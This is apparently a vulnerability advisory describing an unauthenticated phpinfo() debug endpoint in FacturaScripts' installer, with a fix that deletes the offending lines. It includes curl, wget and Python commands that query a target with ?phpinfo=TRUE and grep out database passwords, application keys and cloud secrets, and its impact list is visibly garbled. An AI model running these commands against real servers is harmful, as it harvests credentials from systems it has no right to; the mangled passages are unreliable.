Listen to this Post
How CVE works:
The Installer controller in FacturaScripts contains a hidden debug endpoint that triggers phpinfo() when any unauthenticated request includes the query parameter phpinfo=TRUE. This endpoint was added in commit 8c31c106 on February 27, 2018, and remains present in v2026-39-g262e79208 (April 2026). The vulnerable code resides in `Core/Controller/Installer.php` around line 115: it checks if `$this->request->query(‘phpinfo’, ”)` equals the string ‘TRUE’, then calls `phpinfo()` and returns immediately. No authentication, session, or installation state is verified. An attacker only needs to know the parameter name and value. Because the installer is reachable before configuration is complete (i.e., `config.php` lacks db_name), the endpoint is exposed on fresh deployments. Upon sending GET /?phpinfo=TRUE, the server outputs over 20 pages of PHP configuration, environment variables (including DB_PASSWORD, APP_KEY, AWS_SECRET_ACCESS_KEY), filesystem paths, loaded extensions, HTTP headers, and PHP version details. This is a classic CWE-200 information disclosure, similar to CVE-2025-34081. The attack requires no credentials, cookies, or prior interaction. It works on any reachable FacturaScripts instance where installation has not been finalized. On shared hosting or cloud environments, fresh deployments often remain unconfigured for extended periods, creating a reliable exploitation window. The vulnerability has persisted for over eight years across multiple major versions. A simple curl http://target/?phpinfo=TRUE` retrieves the full dump. The exposure can lead to privilege escalation if environment credentials are reused elsewhere.
<h2 style="color: blue;">dailycve form:</h2>
Platform: FacturaScripts webapp
Version: 2018–2026 (v2026-39)
Vulnerability : Unauthenticated phpinfo disclosure
Severity: High
date: April 13 2026
<h2 style="color: blue;">Prediction: April 20 2026</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics – bash commands to detect and test:</h2>
Check if vulnerable curl -s "http://localhost:8000/?phpinfo=TRUE" | grep -qi "PHP Version" && echo "VULNERABLE" Extract environment variables curl -s "http://localhost:8000/?phpinfo=TRUE" | grep -E "_ENV\[.\]" Simulate attack from remote wget -q -O - "http://target.tld/?phpinfo=TRUE" | grep "DB_PASSWORD"
<h2 style="color: blue;">Code snippet to reproduce:</h2>
import requests
r = requests.get('http://target/?phpinfo=TRUE', verify=False)
if 'PHP Version' in r.text:
print('Credentials found:', r.text.split('DB_PASSWORD'))
<h2 style="color: blue;">Exploit:</h2>
Send unauthenticated GET request to any reachable FacturaScripts instance where `config.php` does not yet contain database credentials:
GET /?phpinfo=TRUE HTTP/1.1 Host: vulnerable-site.com
No headers or body needed. The response contains full `phpinfo()` output. Use grep to extract secrets:
curl -s http://vulnerable-site.com/?phpinfo=TRUE | grep -E '_(PASSWORD|KEY|SECRET)'
<h2 style="color: blue;">Protection from this CVE:</h2>
<h2 style="color: blue;">Remove lines 115–118 inCore/Controller/Installer.php:</h2>
// Delete these lines:
if ('TRUE' === $this->request->query('phpinfo', '')) {
phpinfo();
return;
}
Alternatively, restrict installer access to localhost or add authentication. Apply commit that deletes the debug endpoint, or upgrade to a patched version once released. As a temporary workaround, set `phpinfo=TRUE` to be ignored by a Web Application Firewall rule.
<h2 style="color: blue;">Impact:</h2>
- Exposure of database credentials (DB_PASSWORD,DB_USER) leading to direct database compromise.APP_KEY
- Leak of application secrets (,JWT_SECRET) enabling token forgery.AWS_SECRET_ACCESS_KEY`) allowing lateral movement to cloud infrastructure.
- Cloud provider keys (
– Full filesystem paths facilitating path traversal and local file inclusion attacks.
– Exact PHP version and extension list (e.g., PHP 8.1.34) enabling version-specific CVE exploitation.
– HTTP headers revealing internal reverse proxies, load balancers, or authentication mechanisms.
– Database connection details (socket paths, PDO drivers) aiding further SQL injection or denial-of-service.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
